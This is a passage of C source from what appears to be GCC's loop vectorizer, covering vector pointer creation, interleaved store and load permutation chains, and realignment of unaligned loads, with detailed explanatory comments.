if (TREE_CODE (dr_base_type) == ARRAY_TYPE)
dump_printf (MSG_NOTE, " vectorizing an array ref: ");
else if (TREE_CODE (dr_base_type) == VECTOR_TYPE)
dump_printf (MSG_NOTE, " vectorizing a vector ref: ");
else if (TREE_CODE (dr_base_type) == RECORD_TYPE)
dump_printf (MSG_NOTE, " vectorizing a record based array ref: ");
else
dump_printf (MSG_NOTE, " vectorizing a pointer ref: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_BASE_OBJECT (dr));
dump_printf (MSG_NOTE, "\n");
}
/* (1) Create the new aggregate-pointer variable.
Vector and array types inherit the alias set of their component
type by default so we need to use a ref-all pointer if the data
reference does not conflict with the created aggregated data
reference because it is not addressable. */
bool need_ref_all = false;
if (!alias_sets_conflict_p (get_alias_set (aggr_type),
get_alias_set (DR_REF (dr))))
need_ref_all = true;
/* Likewise for any of the data references in the stmt group. */
else if (STMT_VINFO_GROUP_SIZE (stmt_info) > 1)
{
gimple orig_stmt = STMT_VINFO_GROUP_FIRST_ELEMENT (stmt_info);
do
{
stmt_vec_info sinfo = vinfo_for_stmt (orig_stmt);
struct data_reference *sdr = STMT_VINFO_DATA_REF (sinfo);
if (!alias_sets_conflict_p (get_alias_set (aggr_type),
get_alias_set (DR_REF (sdr))))
{
need_ref_all = true;
break;
}
orig_stmt = STMT_VINFO_GROUP_NEXT_ELEMENT (sinfo);
}
while (orig_stmt);
}
aggr_ptr_type = build_pointer_type_for_mode (aggr_type, ptr_mode,
need_ref_all);
aggr_ptr = vect_get_new_vect_var (aggr_ptr_type, vect_pointer_var, base_name);
/* Note: If the dataref is in an inner-loop nested in LOOP, and we are
vectorizing LOOP (i.e., outer-loop vectorization), we need to create two
def-use update cycles for the pointer: one relative to the outer-loop
(LOOP), which is what steps (3) and (4) below do. The other is relative
to the inner-loop (which is the inner-most loop containing the dataref),
and this is done be step (5) below.
When vectorizing inner-most loops, the vectorized loop (LOOP) is also the
inner-most loop, and so steps (3),(4) work the same, and step (5) is
redundant. Steps (3),(4) create the following:
vp0 = &base_addr;
LOOP: vp1 = phi(vp0,vp2)
...
...
vp2 = vp1 + step
goto LOOP
If there is an inner-loop nested in loop, then step (5) will also be
applied, and an additional update in the inner-loop will be created:
vp0 = &base_addr;
LOOP: vp1 = phi(vp0,vp2)
...
inner: vp3 = phi(vp1,vp4)
vp4 = vp3 + inner_step
if () goto inner
...
vp2 = vp1 + step
if () goto LOOP */
/* (2) Calculate the initial address of the aggregate-pointer, and set
the aggregate-pointer to point to it before the loop. */
/* Create: (&(base[init_val+offset]+byte_offset) in the loop preheader. */
new_temp = vect_create_addr_base_for_vector_ref (stmt, &new_stmt_list,
offset, loop, byte_offset);
if (new_stmt_list)
{
if (pe)
{
new_bb = gsi_insert_seq_on_edge_immediate (pe, new_stmt_list);
gcc_assert (!new_bb);
}
else
gsi_insert_seq_before (gsi, new_stmt_list, GSI_SAME_STMT);
}
*initial_address = new_temp;
/* Create: p = (aggr_type *) initial_base */
if (TREE_CODE (new_temp) != SSA_NAME
|| !useless_type_conversion_p (aggr_ptr_type, TREE_TYPE (new_temp)))
{
vec_stmt = gimple_build_assign (aggr_ptr,
fold_convert (aggr_ptr_type, new_temp));
aggr_ptr_init = make_ssa_name (aggr_ptr, vec_stmt);
/* Copy the points-to information if it exists. */
if (DR_PTR_INFO (dr))
vect_duplicate_ssa_name_ptr_info (aggr_ptr_init, dr, stmt_info);
gimple_assign_set_lhs (vec_stmt, aggr_ptr_init);
if (pe)
{
new_bb = gsi_insert_on_edge_immediate (pe, vec_stmt);
gcc_assert (!new_bb);
}
else
gsi_insert_before (gsi, vec_stmt, GSI_SAME_STMT);
}
else
aggr_ptr_init = new_temp;
/* (3) Handle the updating of the aggregate-pointer inside the loop.
This is needed when ONLY_INIT is false, and also when AT_LOOP is the
inner-loop nested in LOOP (during outer-loop vectorization). */
/* No update in loop is required. */
if (only_init && (!loop_vinfo || at_loop == loop))
aptr = aggr_ptr_init;
else
{
/* The step of the aggregate pointer is the type size. */
tree iv_step = TYPE_SIZE_UNIT (aggr_type);
/* One exception to the above is when the scalar step of the load in
LOOP is zero. In this case the step here is also zero. */
if (*inv_p)
iv_step = size_zero_node;
else if (tree_int_cst_sgn (step) == -1)
iv_step = fold_build1 (NEGATE_EXPR, TREE_TYPE (iv_step), iv_step);
standard_iv_increment_position (loop, &incr_gsi, &insert_after);
create_iv (aggr_ptr_init,
fold_convert (aggr_ptr_type, iv_step),
aggr_ptr, loop, &incr_gsi, insert_after,
&indx_before_incr, &indx_after_incr);
incr = gsi_stmt (incr_gsi);
set_vinfo_for_stmt (incr, new_stmt_vec_info (incr, loop_vinfo, NULL));
/* Copy the points-to information if it exists. */
if (DR_PTR_INFO (dr))
{
vect_duplicate_ssa_name_ptr_info (indx_before_incr, dr, stmt_info);
vect_duplicate_ssa_name_ptr_info (indx_after_incr, dr, stmt_info);
}
if (ptr_incr)
*ptr_incr = incr;
aptr = indx_before_incr;
}
if (!nested_in_vect_loop || only_init)
return aptr;
/* (4) Handle the updating of the aggregate-pointer inside the inner-loop
nested in LOOP, if exists. */
gcc_assert (nested_in_vect_loop);
if (!only_init)
{
standard_iv_increment_position (containing_loop, &incr_gsi,
&insert_after);
create_iv (aptr, fold_convert (aggr_ptr_type, DR_STEP (dr)), aggr_ptr,
containing_loop, &incr_gsi, insert_after, &indx_before_incr,
&indx_after_incr);
incr = gsi_stmt (incr_gsi);
set_vinfo_for_stmt (incr, new_stmt_vec_info (incr, loop_vinfo, NULL));
/* Copy the points-to information if it exists. */
if (DR_PTR_INFO (dr))
{
vect_duplicate_ssa_name_ptr_info (indx_before_incr, dr, stmt_info);
vect_duplicate_ssa_name_ptr_info (indx_after_incr, dr, stmt_info);
}
if (ptr_incr)
*ptr_incr = incr;
return indx_before_incr;
}
else
gcc_unreachable ();
}
/* Function bump_vector_ptr
Increment a pointer (to a vector type) by vector-size. If requested,
i.e. if PTR-INCR is given, then also connect the new increment stmt
to the existing def-use update-chain of the pointer, by modifying
the PTR_INCR as illustrated below:
The pointer def-use update-chain before this function:
DATAREF_PTR = phi (p_0, p_2)
....
PTR_INCR: p_2 = DATAREF_PTR + step
The pointer def-use update-chain after this function:
DATAREF_PTR = phi (p_0, p_2)
....
NEW_DATAREF_PTR = DATAREF_PTR + BUMP
....
PTR_INCR: p_2 = NEW_DATAREF_PTR + step
Input:
DATAREF_PTR - ssa_name of a pointer (to vector type) that is being updated
in the loop.
PTR_INCR - optional. The stmt that updates the pointer in each iteration of
the loop. The increment amount across iterations is expected
to be vector_size.
BSI - location where the new update stmt is to be placed.
STMT - the original scalar memory-access stmt that is being vectorized.
BUMP - optional. The offset by which to bump the pointer. If not given,
the offset is assumed to be vector_size.
Output: Return NEW_DATAREF_PTR as illustrated above.
*/
tree
bump_vector_ptr (tree dataref_ptr, gimple ptr_incr, gimple_stmt_iterator *gsi,
gimple stmt, tree bump)
{
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
tree update = TYPE_SIZE_UNIT (vectype);
gassign *incr_stmt;
ssa_op_iter iter;
use_operand_p use_p;
tree new_dataref_ptr;
if (bump)
update = bump;
new_dataref_ptr = copy_ssa_name (dataref_ptr);
incr_stmt = gimple_build_assign (new_dataref_ptr, POINTER_PLUS_EXPR,
dataref_ptr, update);
vect_finish_stmt_generation (stmt, incr_stmt, gsi);
/* Copy the points-to information if it exists. */
if (DR_PTR_INFO (dr))
{
duplicate_ssa_name_ptr_info (new_dataref_ptr, DR_PTR_INFO (dr));
mark_ptr_info_alignment_unknown (SSA_NAME_PTR_INFO (new_dataref_ptr));
}
if (!ptr_incr)
return new_dataref_ptr;
/* Update the vector-pointer's cross-iteration increment. */
FOR_EACH_SSA_USE_OPERAND (use_p, ptr_incr, iter, SSA_OP_USE)
{
tree use = USE_FROM_PTR (use_p);
if (use == dataref_ptr)
SET_USE (use_p, new_dataref_ptr);
else
gcc_assert (tree_int_cst_compare (use, update) == 0);
}
return new_dataref_ptr;
}
/* Function vect_create_destination_var.
Create a new temporary of type VECTYPE. */
tree
vect_create_destination_var (tree scalar_dest, tree vectype)
{
tree vec_dest;
const char *name;
char *new_name;
tree type;
enum vect_var_kind kind;
kind = vectype ? vect_simple_var : vect_scalar_var;
type = vectype ? vectype : TREE_TYPE (scalar_dest);
gcc_assert (TREE_CODE (scalar_dest) == SSA_NAME);
name = get_name (scalar_dest);
if (name)
new_name = xasprintf ("%s_%u", name, SSA_NAME_VERSION (scalar_dest));
else
new_name = xasprintf ("_%u", SSA_NAME_VERSION (scalar_dest));
vec_dest = vect_get_new_vect_var (type, kind, new_name);
free (new_name);
return vec_dest;
}
/* Function vect_grouped_store_supported.
Returns TRUE if interleave high and interleave low permutations
are supported, and FALSE otherwise. */
bool
vect_grouped_store_supported (tree vectype, unsigned HOST_WIDE_INT count)
{
machine_mode mode = TYPE_MODE (vectype);
/* vect_permute_store_chain requires the group size to be equal to 3 or
be a power of two. */
if (count != 3 && exact_log2 (count) == -1)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"the size of the group of accesses"
" is not a power of 2 or not eqaul to 3\n");
return false;
}
/* Check that the permutation is supported. */
if (VECTOR_MODE_P (mode))
{
unsigned int i, nelt = GET_MODE_NUNITS (mode);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
if (count == 3)
{
unsigned int j0 = 0, j1 = 0, j2 = 0;
unsigned int i, j;
for (j = 0; j < 3; j++)
{
int nelt0 = ((3 - j) * nelt) % 3;
int nelt1 = ((3 - j) * nelt + 1) % 3;
int nelt2 = ((3 - j) * nelt + 2) % 3;
for (i = 0; i < nelt; i++)
{
if (3 * i + nelt0 < nelt)
sel[3 * i + nelt0] = j0++;
if (3 * i + nelt1 < nelt)
sel[3 * i + nelt1] = nelt + j1++;
if (3 * i + nelt2 < nelt)
sel[3 * i + nelt2] = 0;
}
if (!can_vec_perm_p (mode, false, sel))
{
if (dump_enabled_p ())
dump_printf (MSG_MISSED_OPTIMIZATION,
"permutaion op not supported by target.\n");
return false;
}
for (i = 0; i < nelt; i++)
{
if (3 * i + nelt0 < nelt)
sel[3 * i + nelt0] = 3 * i + nelt0;
if (3 * i + nelt1 < nelt)
sel[3 * i + nelt1] = 3 * i + nelt1;
if (3 * i + nelt2 < nelt)
sel[3 * i + nelt2] = nelt + j2++;
}
if (!can_vec_perm_p (mode, false, sel))
{
if (dump_enabled_p ())
dump_printf (MSG_MISSED_OPTIMIZATION,
"permutaion op not supported by target.\n");
return false;
}
}
return true;
}
else
{
/* If length is not equal to 3 then only power of 2 is supported. */
gcc_assert (exact_log2 (count) != -1);
for (i = 0; i < nelt / 2; i++)
{
sel[i * 2] = i;
sel[i * 2 + 1] = i + nelt;
}
if (can_vec_perm_p (mode, false, sel))
{
for (i = 0; i < nelt; i++)
sel[i] += nelt / 2;
if (can_vec_perm_p (mode, false, sel))
return true;
}
}
}
if (dump_enabled_p ())
dump_printf (MSG_MISSED_OPTIMIZATION,
"permutaion op not supported by target.\n");
return false;
}
/* Return TRUE if vec_store_lanes is available for COUNT vectors of
type VECTYPE. */
bool
vect_store_lanes_supported (tree vectype, unsigned HOST_WIDE_INT count)
{
return vect_lanes_optab_supported_p ("vec_store_lanes",
vec_store_lanes_optab,
vectype, count);
}
/* Function vect_permute_store_chain.
Given a chain of interleaved stores in DR_CHAIN of LENGTH that must be
a power of 2 or equal to 3, generate interleave_high/low stmts to reorder
the data correctly for the stores. Return the final references for stores
in RESULT_CHAIN.
E.g., LENGTH is 4 and the scalar type is short, i.e., VF is 8.
The input is 4 vectors each containing 8 elements. We assign a number to
each element, the input sequence is:
1st vec: 0 1 2 3 4 5 6 7
2nd vec: 8 9 10 11 12 13 14 15
3rd vec: 16 17 18 19 20 21 22 23
4th vec: 24 25 26 27 28 29 30 31
The output sequence should be:
1st vec: 0 8 16 24 1 9 17 25
2nd vec: 2 10 18 26 3 11 19 27
3rd vec: 4 12 20 28 5 13 21 30
4th vec: 6 14 22 30 7 15 23 31
i.e., we interleave the contents of the four vectors in their order.
We use interleave_high/low instructions to create such output. The input of
each interleave_high/low operation is two vectors:
1st vec 2nd vec
0 1 2 3 4 5 6 7
the even elements of the result vector are obtained left-to-right from the
high/low elements of the first vector. The odd elements of the result are
obtained left-to-right from the high/low elements of the second vector.
The output of interleave_high will be: 0 4 1 5
and of interleave_low: 2 6 3 7
The permutation is done in log LENGTH stages. In each stage interleave_high
and interleave_low stmts are created for each pair of vectors in DR_CHAIN,
where the first argument is taken from the first half of DR_CHAIN and the
second argument from it's second half.
In our example,
I1: interleave_high (1st vec, 3rd vec)
I2: interleave_low (1st vec, 3rd vec)
I3: interleave_high (2nd vec, 4th vec)
I4: interleave_low (2nd vec, 4th vec)
The output for the first stage is:
I1: 0 16 1 17 2 18 3 19
I2: 4 20 5 21 6 22 7 23
I3: 8 24 9 25 10 26 11 27
I4: 12 28 13 29 14 30 15 31
The output of the second stage, i.e. the final result is:
I1: 0 8 16 24 1 9 17 25
I2: 2 10 18 26 3 11 19 27
I3: 4 12 20 28 5 13 21 30
I4: 6 14 22 30 7 15 23 31. */
void
vect_permute_store_chain (vec<tree> dr_chain,
unsigned int length,
gimple stmt,
gimple_stmt_iterator *gsi,
vec<tree> *result_chain)
{
tree vect1, vect2, high, low;
gimple perm_stmt;
tree vectype = STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt));
tree perm_mask_low, perm_mask_high;
tree data_ref;
tree perm3_mask_low, perm3_mask_high;
unsigned int i, n, log_length = exact_log2 (length);
unsigned int j, nelt = TYPE_VECTOR_SUBPARTS (vectype);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
result_chain->quick_grow (length);
memcpy (result_chain->address (), dr_chain.address (),
length * sizeof (tree));
if (length == 3)
{
unsigned int j0 = 0, j1 = 0, j2 = 0;
for (j = 0; j < 3; j++)
{
int nelt0 = ((3 - j) * nelt) % 3;
int nelt1 = ((3 - j) * nelt + 1) % 3;
int nelt2 = ((3 - j) * nelt + 2) % 3;
for (i = 0; i < nelt; i++)
{
if (3 * i + nelt0 < nelt)
sel[3 * i + nelt0] = j0++;
if (3 * i + nelt1 < nelt)
sel[3 * i + nelt1] = nelt + j1++;
if (3 * i + nelt2 < nelt)
sel[3 * i + nelt2] = 0;
}
perm3_mask_low = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < nelt; i++)
{
if (3 * i + nelt0 < nelt)
sel[3 * i + nelt0] = 3 * i + nelt0;
if (3 * i + nelt1 < nelt)
sel[3 * i + nelt1] = 3 * i + nelt1;
if (3 * i + nelt2 < nelt)
sel[3 * i + nelt2] = nelt + j2++;
}
perm3_mask_high = vect_gen_perm_mask_checked (vectype, sel);
vect1 = dr_chain[0];
vect2 = dr_chain[1];
/* Create interleaving stmt:
low = VEC_PERM_EXPR <vect1, vect2,
{j, nelt, *, j + 1, nelt + j + 1, *,
j + 2, nelt + j + 2, *, ...}> */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3_low");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, vect1,
vect2, perm3_mask_low);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect1 = data_ref;
vect2 = dr_chain[2];
/* Create interleaving stmt:
low = VEC_PERM_EXPR <vect1, vect2,
{0, 1, nelt + j, 3, 4, nelt + j + 1,
6, 7, nelt + j + 2, ...}> */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3_high");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, vect1,
vect2, perm3_mask_high);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j] = data_ref;
}
}
else
{
/* If length is not equal to 3 then only power of 2 is supported. */
gcc_assert (exact_log2 (length) != -1);
for (i = 0, n = nelt / 2; i < n; i++)
{
sel[i * 2] = i;
sel[i * 2 + 1] = i + nelt;
}
perm_mask_high = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < nelt; i++)
sel[i] += nelt / 2;
perm_mask_low = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0, n = log_length; i < n; i++)
{
for (j = 0; j < length/2; j++)
{
vect1 = dr_chain[j];
vect2 = dr_chain[j+length/2];
/* Create interleaving stmt:
high = VEC_PERM_EXPR <vect1, vect2, {0, nelt, 1, nelt+1,
...}> */
high = make_temp_ssa_name (vectype, NULL, "vect_inter_high");
perm_stmt = gimple_build_assign (high, VEC_PERM_EXPR, vect1,
vect2, perm_mask_high);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[2*j] = high;
/* Create interleaving stmt:
low = VEC_PERM_EXPR <vect1, vect2,
{nelt/2, nelt*3/2, nelt/2+1, nelt*3/2+1,
...}> */
low = make_temp_ssa_name (vectype, NULL, "vect_inter_low");
perm_stmt = gimple_build_assign (low, VEC_PERM_EXPR, vect1,
vect2, perm_mask_low);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[2*j+1] = low;
}
memcpy (dr_chain.address (), result_chain->address (),
length * sizeof (tree));
}
}
}
/* Function vect_setup_realignment
This function is called when vectorizing an unaligned load using
the dr_explicit_realign[_optimized] scheme.
This function generates the following code at the loop prolog:
p = initial_addr;
x msq_init = *(floor(p)); # prolog load
realignment_token = call target_builtin;
loop:
x msq = phi (msq_init, ---)
The stmts marked with x are generated only for the case of
dr_explicit_realign_optimized.
The code above sets up a new (vector) pointer, pointing to the first
location accessed by STMT, and a "floor-aligned" load using that pointer.
It also generates code to compute the "realignment-token" (if the relevant
target hook was defined), and creates a phi-node at the loop-header bb
whose arguments are the result of the prolog-load (created by this
function) and the result of a load that takes place in the loop (to be
created by the caller to this function).
For the case of dr_explicit_realign_optimized:
The caller to this function uses the phi-result (msq) to create the
realignment code inside the loop, and sets up the missing phi argument,
as follows:
loop:
msq = phi (msq_init, lsq)
lsq = *(floor(p')); # load in loop
result = realign_load (msq, lsq, realignment_token);
For the case of dr_explicit_realign:
loop:
msq = *(floor(p)); # load in loop
p' = p + (VS-1);
lsq = *(floor(p')); # load in loop
result = realign_load (msq, lsq, realignment_token);
Input:
STMT - (scalar) load stmt to be vectorized. This load accesses
a memory location that may be unaligned.
BSI - place where new code is to be inserted.
ALIGNMENT_SUPPORT_SCHEME - which of the two misalignment handling schemes
is used.
Output:
REALIGNMENT_TOKEN - the result of a call to the builtin_mask_for_load
target hook, if defined.
Return value - the result of the loop-header phi node. */
tree
vect_setup_realignment (gimple stmt, gimple_stmt_iterator *gsi,
tree *realignment_token,
enum dr_alignment_support alignment_support_scheme,
tree init_addr,
struct loop **at_loop)
{
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
struct loop *loop = NULL;
edge pe = NULL;
tree scalar_dest = gimple_assign_lhs (stmt);
tree vec_dest;
gimple inc;
tree ptr;
tree data_ref;
basic_block new_bb;
tree msq_init = NULL_TREE;
tree new_temp;
gphi *phi_stmt;
tree msq = NULL_TREE;
gimple_seq stmts = NULL;
bool inv_p;
bool compute_in_loop = false;
bool nested_in_vect_loop = false;
struct loop *containing_loop = (gimple_bb (stmt))->loop_father;
struct loop *loop_for_initial_load = NULL;
if (loop_vinfo)
{
loop = LOOP_VINFO_LOOP (loop_vinfo);
nested_in_vect_loop = nested_in_vect_loop_p (loop, stmt);
}
gcc_assert (alignment_support_scheme == dr_explicit_realign
|| alignment_support_scheme == dr_explicit_realign_optimized);
/* We need to generate three things:
1. the misalignment computation
2. the extra vector load (for the optimized realignment scheme).
3. the phi node for the two vectors from which the realignment is
done (for the optimized realignment scheme). */
/* 1. Determine where to generate the misalignment computation.
If INIT_ADDR is NULL_TREE, this indicates that the misalignment
calculation will be generated by this function, outside the loop (in the
preheader). Otherwise, INIT_ADDR had already been computed for us by the
caller, inside the loop.
Background: If the misalignment remains fixed throughout the iterations of
the loop, then both realignment schemes are applicable, and also the
misalignment computation can be done outside LOOP. This is because we are
vectorizing LOOP, and so the memory accesses in LOOP advance in steps that
are a multiple of VS (the Vector Size), and therefore the misalignment in
different vectorized LOOP iterations is always the same.
The problem arises only if the memory access is in an inner-loop nested
inside LOOP, which is now being vectorized using outer-loop vectorization.
This is the only case when the misalignment of the memory access may not
remain fixed throughout the iterations of the inner-loop (as explained in
detail in vect_supportable_dr_alignment). In this case, not only is the
optimized realignment scheme not applicable, but also the misalignment
computation (and generation of the realignment token that is passed to
REALIGN_LOAD) have to be done inside the loop.
In short, INIT_ADDR indicates whether we are in a COMPUTE_IN_LOOP mode
or not, which in turn determines if the misalignment is computed inside
the inner-loop, or outside LOOP. */
if (init_addr != NULL_TREE || !loop_vinfo)
{
compute_in_loop = true;
gcc_assert (alignment_support_scheme == dr_explicit_realign);
}
/* 2. Determine where to generate the extra vector load.
For the optimized realignment scheme, instead of generating two vector
loads in each iteration, we generate a single extra vector load in the
preheader of the loop, and in each iteration reuse the result of the
vector load from the previous iteration. In case the memory access is in
an inner-loop nested inside LOOP, which is now being vectorized using
outer-loop vectorization, we need to determine whether this initial vector
load should be generated at the preheader of the inner-loop, or can be
generated at the preheader of LOOP. If the memory access has no evolution
in LOOP, it can be generated in the preheader of LOOP. Otherwise, it has
to be generated inside LOOP (in the preheader of the inner-loop). */
if (nested_in_vect_loop)
{
tree outerloop_step = STMT_VINFO_DR_STEP (stmt_info);
bool invariant_in_outerloop =
(tree_int_cst_compare (outerloop_step, size_zero_node) == 0);
loop_for_initial_load = (invariant_in_outerloop ? loop : loop->inner);
}
else
loop_for_initial_load = loop;
if (at_loop)
*at_loop = loop_for_initial_load;
if (loop_for_initial_load)
pe = loop_preheader_edge (loop_for_initial_load);
/* 3. For the case of the optimized realignment, create the first vector
load at the loop preheader. */
if (alignment_support_scheme == dr_explicit_realign_optimized)
{
/* Create msq_init = *(floor(p1)) in the loop preheader */
gassign *new_stmt;
gcc_assert (!compute_in_loop);
vec_dest = vect_create_destination_var (scalar_dest, vectype);
ptr = vect_create_data_ref_ptr (stmt, vectype, loop_for_initial_load,
NULL_TREE, &init_addr, NULL, &inc,
true, &inv_p);
new_temp = copy_ssa_name (ptr);
new_stmt = gimple_build_assign
(new_temp, BIT_AND_EXPR, ptr,
build_int_cst (TREE_TYPE (ptr),
-(HOST_WIDE_INT)TYPE_ALIGN_UNIT (vectype)));
new_bb = gsi_insert_on_edge_immediate (pe, new_stmt);
gcc_assert (!new_bb);
data_ref
= build2 (MEM_REF, TREE_TYPE (vec_dest), new_temp,
build_int_cst (reference_alias_ptr_type (DR_REF (dr)), 0));
new_stmt = gimple_build_assign (vec_dest, data_ref);
new_temp = make_ssa_name (vec_dest, new_stmt);
gimple_assign_set_lhs (new_stmt, new_temp);
if (pe)
{
new_bb = gsi_insert_on_edge_immediate (pe, new_stmt);
gcc_assert (!new_bb);
}
else
gsi_insert_before (gsi, new_stmt, GSI_SAME_STMT);
msq_init = gimple_assign_lhs (new_stmt);
}
/* 4. Create realignment token using a target builtin, if available.
It is done either inside the containing loop, or before LOOP (as
determined above). */
if (targetm.vectorize.builtin_mask_for_load)
{
gcall *new_stmt;
tree builtin_decl;
/* Compute INIT_ADDR - the initial addressed accessed by this memref. */
if (!init_addr)
{
/* Generate the INIT_ADDR computation outside LOOP. */
init_addr = vect_create_addr_base_for_vector_ref (stmt, &stmts,
NULL_TREE, loop);
if (loop)
{
pe = loop_preheader_edge (loop);
new_bb = gsi_insert_seq_on_edge_immediate (pe, stmts);
gcc_assert (!new_bb);
}
else
gsi_insert_seq_before (gsi, stmts, GSI_SAME_STMT);
}
builtin_decl = targetm.vectorize.builtin_mask_for_load ();
new_stmt = gimple_build_call (builtin_decl, 1, init_addr);
vec_dest =
vect_create_destination_var (scalar_dest,
gimple_call_return_type (new_stmt));
new_temp = make_ssa_name (vec_dest, new_stmt);
gimple_call_set_lhs (new_stmt, new_temp);
if (compute_in_loop)
gsi_insert_before (gsi, new_stmt, GSI_SAME_STMT);
else
{
/* Generate the misalignment computation outside LOOP. */
pe = loop_preheader_edge (loop);
new_bb = gsi_insert_on_edge_immediate (pe, new_stmt);
gcc_assert (!new_bb);
}
*realignment_token = gimple_call_lhs (new_stmt);
/* The result of the CALL_EXPR to this builtin is determined from
the value of the parameter and no global variables are touched
which makes the builtin a "const" function. Requiring the
builtin to have the "const" attribute makes it unnecessary
to call mark_call_clobbered. */
gcc_assert (TREE_READONLY (builtin_decl));
}
if (alignment_support_scheme == dr_explicit_realign)
return msq;
gcc_assert (!compute_in_loop);
gcc_assert (alignment_support_scheme == dr_explicit_realign_optimized);
/* 5. Create msq = phi <msq_init, lsq> in loop */
pe = loop_preheader_edge (containing_loop);
vec_dest = vect_create_destination_var (scalar_dest, vectype);
msq = make_ssa_name (vec_dest);
phi_stmt = create_phi_node (msq, containing_loop->header);
add_phi_arg (phi_stmt, msq_init, pe, UNKNOWN_LOCATION);
return msq;
}
/* Function vect_grouped_load_supported.
Returns TRUE if even and odd permutations are supported,
and FALSE otherwise. */
bool
vect_grouped_load_supported (tree vectype, unsigned HOST_WIDE_INT count)
{
machine_mode mode = TYPE_MODE (vectype);
/* vect_permute_load_chain requires the group size to be equal to 3 or
be a power of two. */
if (count != 3 && exact_log2 (count) == -1)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"the size of the group of accesses"
" is not a power of 2 or not equal to 3\n");
return false;
}
/* Check that the permutation is supported. */
if (VECTOR_MODE_P (mode))
{
unsigned int i, j, nelt = GET_MODE_NUNITS (mode);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
if (count == 3)
{
unsigned int k;
for (k = 0; k < 3; k++)
{
for (i = 0; i < nelt; i++)
if (3 * i + k < 2 * nelt)
sel[i] = 3 * i + k;
else
sel[i] = 0;
if (!can_vec_perm_p (mode, false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 3 loads is not supported by"
" target\n");
return false;
}
for (i = 0, j = 0; i < nelt; i++)
if (3 * i + k < 2 * nelt)
sel[i] = i;
else
sel[i] = nelt + ((nelt + k) % 3) + 3 * (j++);
if (!can_vec_perm_p (mode, false, sel))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"shuffle of 3 loads is not supported by"
" target\n");
return false;
}
}
return true;
}
else
{
/* If length is not equal to 3 then only power of 2 is supported. */
gcc_assert (exact_log2 (count) != -1);
for (i = 0; i < nelt; i++)
sel[i] = i * 2;
if (can_vec_perm_p (mode, false, sel))
{
for (i = 0; i < nelt; i++)
sel[i] = i * 2 + 1;
if (can_vec_perm_p (mode, false, sel))
return true;
}
}
}
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"extract even/odd not supported by target\n");
return false;
}
/* Return TRUE if vec_load_lanes is available for COUNT vectors of
type VECTYPE. */
bool
vect_load_lanes_supported (tree vectype, unsigned HOST_WIDE_INT count)
{
return vect_lanes_optab_supported_p ("vec_load_lanes",
vec_load_lanes_optab,
vectype, count);
}
/* Function vect_permute_load_chain.
Given a chain of interleaved loads in DR_CHAIN of LENGTH that must be
a power of 2 or equal to 3, generate extract_even/odd stmts to reorder
the input data correctly. Return the final references for loads in
RESULT_CHAIN.
E.g., LENGTH is 4 and the scalar type is short, i.e., VF is 8.
The input is 4 vectors each containing 8 elements. We assign a number to each
element, the input sequence is:
1st vec: 0 1 2 3 4 5 6 7
2nd vec: 8 9 10 11 12 13 14 15
3rd vec: 16 17 18 19 20 21 22 23
4th vec: 24 25 26 27 28 29 30 31
The output sequence should be:
1st vec: 0 4 8 12 16 20 24 28
2nd vec: 1 5 9 13 17 21 25 29
3rd vec: 2 6 10 14 18 22 26 30
4th vec: 3 7 11 15 19 23 27 31
i.e., the first output vector should contain the first elements of each
interleaving group, etc.
We use extract_even/odd instructions to create such output. The input of
each extract_even/odd operation is two vectors
1st vec 2nd vec
0 1 2 3 4 5 6 7
and the output is the vector of extracted even/odd elements. The output of
extract_even will be: 0 2 4 6
and of extract_odd: 1 3 5 7
The permutation is done in log LENGTH stages. In each stage extract_even
and extract_odd stmts are created for each pair of vectors in DR_CHAIN in
their order. In our example,
E1: extract_even (1st vec, 2nd vec)
E2: extract_odd (1st vec, 2nd vec)
E3: extract_even (3rd vec, 4th vec)
E4: extract_odd (3rd vec, 4th vec)
The output for the first stage will be:
E1: 0 2 4 6 8 10 12 14
E2: 1 3 5 7 9 11 13 15
E3: 16 18 20 22 24 26 28 30
E4: 17 19 21 23 25 27 29 31
In order to proceed and create the correct sequence for the next stage (or
for the correct output, if the second stage is the last one, as in our
example), we first put the output of extract_even operation and then the
output of extract_odd in RESULT_CHAIN (which is then copied to DR_CHAIN).
The input for the second stage is:
1st vec (E1): 0 2 4 6 8 10 12 14
2nd vec (E3): 16 18 20 22 24 26 28 30
3rd vec (E2): 1 3 5 7 9 11 13 15
4th vec (E4): 17 19 21 23 25 27 29 31
The output of the second stage:
E1: 0 4 8 12 16 20 24 28
E2: 2 6 10 14 18 22 26 30
E3: 1 5 9 13 17 21 25 29
E4: 3 7 11 15 19 23 27 31
And RESULT_CHAIN after reordering:
1st vec (E1): 0 4 8 12 16 20 24 28
2nd vec (E3): 1 5 9 13 17 21 25 29
3rd vec (E2): 2 6 10 14 18 22 26 30
4th vec (E4): 3 7 11 15 19 23 27 31. */
static void
